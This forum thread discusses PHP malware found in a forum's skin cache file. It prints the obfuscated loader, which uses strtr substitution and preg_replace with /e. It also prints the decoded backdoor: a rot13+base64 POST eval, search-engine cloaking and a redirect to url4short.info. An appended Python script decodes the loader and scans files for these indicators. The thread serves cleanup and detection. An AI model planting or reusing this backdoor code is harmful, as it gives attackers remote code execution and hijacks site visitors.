RSS Feeds Link Problem


Annon

Hey guys

This was something that used to hit us on the old forum. I believe it's a hack/vulnerability in the software. I fixed the old one, now I'm going to have to track it down again in the new software.

Sorry about that, it will hopefully be fixed soon.

M

  • Like 1

Hey

I tracked down the problem. It was hidden in a cache file for the forum. I've cleaned up the hacked code and it should be fixed now. I still haven't managed to track down how they're getting in, so it might pop up again. I'm going to keep searching for the backdoor, but in the meantime if it crops up again then please let me know.

Thanks

Marc

P.S. If anyone's interested, this is the code that was screwing everyone up:

[CODE]
// 32-character hex key: the name of the POST parameter the backdoor listens on (see the decoded second stage posted later in this thread)
$k='b2488714339183624a45a9373ae8d945';
// Second stage, hidden by a per-character substitution: each character of $jsa found in $mds is swapped for the character at the same position in $jsb
$mds='O7Agi6;AxO2IXFOB@FOiDZ"&Dfg[A/&a,JnsjfgvkZ,_;vo)A<&[Jf/IAJo)B~E"A}"cO~4ckUF"AJoP;ZR$Jf/~Bv&~B~Bx%U"KDZ"@Dfz7,_&gBsD7Bs%sLTlcj=_c,0VcB=ogFUE"J_C^{_4;DZ(Fk}ggFvRxkZDVBf{foR&",<o7,Z{@B=4~J=D7FTWakU4]{W&./Rx"A_)ck}"KDe{&neC~,<F];<R)wfE@D~o0;=4uB=Cc,Z/~]Zo~wJFx]eoxFJDP]egV;v4gOUocD~P"J_oR{g,R{gxs}R4{{R&/{)/}J)Re4{${D_)cj~4v^{CPwJDa,/&_BvP@DR&.4/D<4/D;D)V{/RC]{"/Z4/DR{0FFk.x"wa_lDZ,;DfV7B=nsJ.x"B>_lBeDg,_&(wJ4>AUEsYfzcFv/BLvo7;Jzs;f&s;Z/BLsz$w<V7;_P[]ZDc;vB[wf&(]egV;v4gORP[Bs/uBvR(wvzgBgP[Bs/uwvRc,e/BL0ocD~P"w~"KDZE&DR&.4/D<4/D;D)V{/RC]}W&./UFFj~40^}4)AZgaL.$a,J4)A<$sB_xswf&7AfggJfg"D_)KDZB&DZY[D=ogB=oc;f$]A<nsj~4g^}40L0Fxw<$sJfg"Dax",T_g;JC)O}E"J_oR{g,R{gxs}R4{{R&wJ)_^<0FFk.(c,0Vg;JC)O}E"J)o^.)(D4/x",/)ckJ(c,0VcB=ogFUE"J)FR/RxsAJC0F0FFk}wvkURg;JC)O}E"J)FR/Rxs,~FFk}"vD0EV,<_PFe"@DR&T.)&L}{/;DZFFk}"cOfgvkU4>^.)"AUgKA<w@DZncBf/)wf&7AfggkU4gLUFg;0BxFZg(,}Ecka%f%TlPk.x";._aF<DaFeY@;<n_kU4@k}PPLTEcj=C~A<$)kUD";fo_;</[FU$x;foVFZg7;>)sAe4)BT@7L=/~;T4aAZ&~FU$c;v,7L=x";J)sY0"K]</IAJnK]<gvkUEVDe{cD0w"B0gKDWgnn"V{.{P[^}YuBfo~AJC)Ye4$BZ{&D=4gOen7AvRfwJo>BvgPFUBEB=D>^}FKDe4@AJ%(^sogFe4c;vFa<~F0;fR~,R&_BvPsJJ)7A<$",JE[BZVP^fgPwsw&O~4)AZgaL.$~,<FcB=4~O})`BV3iI=N`;=/)Be/)L.$V;s4cnfR>AZ/YwJo@]},V;JlK,a_SB~B`BV3iI=N`^U&aw=DcBen`BV3iI=N`Y>(&]nNNq';
// The two substitution alphabets (same length; position i of $jsa maps to position i of $jsb)
$jsa='jEK!u>WQ^CfRP98_%Xwtk&;5qJh0?1Nz{Zi:/vd[s|cO@#-<+=]M"o`y.UAmrG*aeg,2}Tbl(Fx~4SB$3YDIHLn7)pV6';
$jsb='Og7+8jE>PB2Fw`~1M_Y#K9b-;X=i]|)xUG(<Vm&un%peo^}W*3f:kN.?TCa!,{[zHlZ6SD"AtdsyRqc5rIJ4/LQv0$h@';
// Builds the regex '#c#' plus the character stored at offset 213 of the payload, an 'e': the /e modifier, which makes preg_replace() evaluate its replacement as PHP
$i='#c#'.substr($mds,213,1);
// Decodes $mds with strtr() and runs the result: the single 'c' in 'css' matches once, so the decoded replacement is evaluated once
$ipd=preg_replace($i,strtr($mds,$jsa,$jsb),'css');
[/CODE]

  • Like 2

Thanks Marc, hate people hacking around to screw others. Or is it because this forum software is not that popular/well-maintained?

This was also showing for already opened tabs from odforce, with no way to know the address of the thread. I will let you know if I see it again :)


I still haven't managed to track down how they're getting in, so it might pop up again. I'm going to keep searching for the backdoor, but in the meantime if it crops up again then please let me know.

Is it possible that the webserver itself is rooted via other means? e.g. brute-force remote root password guessing via ssh


Thanks Marc, hate people hacking around to screw others. Or is it because this forum software is not that popular/well-maintained?

I've researched this quite a lot and this hack is showing up in this forum, wordpress, vbulletin and a bunch of other popular pieces of software out there. Unfortunately there doesn't seem to be any idea of how it's happening.

Is it possible that the webserver itself is rooted via other means? e.g. brute-force remote root password guessing via ssh

I've scoured the logs and there's no sign of anyone logging in via ssh other than myself, however it is possible. I suspect they got in through a vulnerability in the software and have left a backdoor somewhere. As you can see by the code I posted above, it's not exactly obvious what to look for. I've found some scripts on the server that allow someone complete access to all the files in the webroot on the server. Scary, but almost impossible to track down.

I'll keep looking though, thanks for letting me know it's back.

M

  • Like 1

  • 1 month later...

Thank you so much Marc.

I've got the same problem.

Following your code, I searched and found that the file /cache/skin_cache/cacheid_1/skin_global.php is infected. I rebuilt the skin and the file was overwritten.

I don't know how hackers can change that file. Could you please give me some advice?


I have just decoded that script and got:

[CODE]
// Silence PHP errors so the injected code never shows up on the page or in the error log
$i='ini_set';
if(function_exists($i)){
$i('display_errors',0);
$i('log_errors',0);
}
// Remote code execution backdoor: a POST parameter named by $k is rot13'd, base64-decoded and eval'd
if(isset($_POST[$k]))eval(base64_decode(str_rot13($_POST[$k])));
// Cloaking: detect crawlers by user agent, and detect visitors arriving from a search engine by referer host
$u=@preg_match('#bot|spider|crawl|slurp|yandex#i',$_SERVER['HTTP_USER_AGENT']);
$f=@parse_url($_SERVER['HTTP_REFERER']);
$c=@$f['host'];
$r=@preg_match('#live\.com|google\.|yahoo\.|bing.com|yandex\.ru|rambler\.ru|baidu\.#i',$c);
$h=$_SERVER['HTTP_HOST'];
// Runs inside the forum's skin class, so it reuses the forum's cookie prefix for its own 'lang_id' marker cookie
$b=$this->settings['cookie_id'];
$g=$b.'session_id';
$e=$b.'lang_id';
$d=empty($_SERVER['HTTP_X_MOZ']);
// Only visitors without the marker cookie are touched
if(empty($_COOKIE[$e])){
// A follow-up request carrying ipbv and g parameters, a session cookie and a referer on this same host: set the 10-hour marker cookie and return a JavaScript redirect
if(isset($_GET['ipbv'])&&(!empty($_GET['g']))&&(!empty($_COOKIE[$g]))){
if($c==$h){
if($d)setcookie($e,'en',time()+36000);
$m=substr(md5($h),0,8);
print("document.location='http://url4short.info/{$m}'");
}
exit;}
// Otherwise, for non-bot visitors who came from a search engine, append to the page output (the appended string is empty as posted here)
if((!$u)&&$r){$IPBHTML.="";}
}
[/CODE]

Following the above code, the problem will occur after 10 hours (= 36000 / 60 / 60) since the last click from a search engine (not just Google but Yahoo, Bing, Baidu, ...).

We can check the 'lang_id' cookie; if it exists (and equals 'en'), the system may be infected by that virus.

Edited by intefor
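To support the checks intefor describes (the marker cookie, the search-engine referer cloaking, the decoded backdoor) and to show what the substitution in Marc's posted snippet actually hides, here is an added Python triage script; it is not code from this thread or from the forum software. It embeds the two alphabets and only the first 220 characters of the posted $mds, and the function and indicator names are my own.

```python
"""Offline triage of the skin_global.php injection discussed in this thread (added example)."""
import re
from pathlib import Path

# Substitution alphabets copied verbatim from the first-stage code posted above.
JSA = 'jEK!u>WQ^CfRP98_%Xwtk&;5qJh0?1Nz{Zi:/vd[s|cO@#-<+=]M"o`y.UAmrG*aeg,2}Tbl(Fx~4SB$3YDIHLn7)pV6'
JSB = 'Og7+8jE>PB2Fw`~1M_Y#K9b-;X=i]|)xUG(<Vm&un%peo^}W*3f:kN.?TCa!,{[zHlZ6SD"AtdsyRqc5rIJ4/LQv0$h@'
# First 220 characters of the posted $mds (truncated on purpose); enough to cover offset 213.
MDS_PREFIX = 'O7Agi6;AxO2IXFOB@FOiDZ"&Dfg[A/&a,JnsjfgvkZ,_;vo)A<&[Jf/IAJo)B~E"A}"cO~4ckUF"AJoP;ZR$Jf/~Bv&~B~Bx%U"KDZ"@Dfz7,_&gBsD7Bs%sLTlcj=_c,0VcB=ogFUE"J_C^{_4;DZ(Fk}ggFvRxkZDVBf{foR&",<o7,Z{@B=4~J=D7FTWakU4]{W&./Rx"A_)ck}"KDe{&neC~'

def strtr(text, frm, to):
    """PHP strtr($text,$from,$to): one-to-one character substitution, which is all that hides $mds."""
    return text.translate(str.maketrans(frm, to))

def decode_first_stage(mds, jsa=JSA, jsb=JSB, offset=213):
    """Rebuild what the injected snippet hands to preg_replace: the pattern is '#c#' plus the byte
    hidden at $mds[offset]; when that byte is 'e' the deprecated /e modifier makes preg_replace
    eval() the decoded replacement, so the substitution output is the real second stage."""
    pattern = "#c#" + mds[offset]
    return {"pattern": pattern, "evaluates": pattern.endswith("e"), "code": strtr(mds, jsa, jsb)}

# Indicators taken from the two stages shown in this thread, as regexes over PHP source.
INDICATORS = {
    "preg_replace with variable pattern over strtr()": re.compile(r"preg_replace\s*\(\s*\$\w+\s*,\s*strtr\s*\("),
    "modifier byte pulled out of the payload": re.compile(r"'#\w#'\s*\.\s*substr\s*\("),
    "rot13+base64 POST eval backdoor": re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*str_rot13\s*\(\s*\$_POST"),
    "search-engine referer cloaking": re.compile(r"preg_match\s*\(\s*'#[^']*google\\\."),
    "redirect to url4short.info": re.compile(r"url4short\.info"),
}

def scan_source(php_source):
    """Names of every indicator present in one PHP source string (order follows INDICATORS)."""
    return [name for name, rx in INDICATORS.items() if rx.search(php_source)]

def scan_tree(root):
    """Scan every .php file below root, e.g. the forum's cache/skin_cache directory."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        found = scan_source(path.read_text(errors="replace"))
        if found:
            hits[str(path)] = found
    return hits

# Constructed samples: the first-stage loader lines and three lines of the decoded second stage.
STAGE1_SAMPLE = "$i='#c#'.substr($mds,213,1);\n$ipd=preg_replace($i,strtr($mds,$jsa,$jsb),'css');"
STAGE2_SAMPLE = ("if(isset($_POST[$k]))eval(base64_decode(str_rot13($_POST[$k])));\n"
                 "$r=@preg_match('#live\\.com|google\\.|yahoo\\.#i',$c);\n"
                 "print(\"document.location='http://url4short.info/{$m}'\");")
```

Run scan_tree() over a copy of the cache directory and rebuild any skin that reports a hit; decode_first_stage() on the full posted $mds shows that the pattern becomes '#c#e' and the decoded text opens with eval(@base64_decode(.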

Hey

Yeah, I've managed to track down the problem itself, but sadly I haven't managed to discover the root of the problem (i.e. the source of infection). My solution to get rid of it was to change the ownership of all my php files/directories to the php user (which is 'nobody' in my case). Happily we're on a VPS, so this works and now no-one has permissions to change any of my files anymore. If you're on a shared server then I don't think this solution would work for you.

But yeah. I don't know how they manage to insert code into the forum cache files. I wish I did, I hate not knowing how they're getting in :).

M

  • Like 2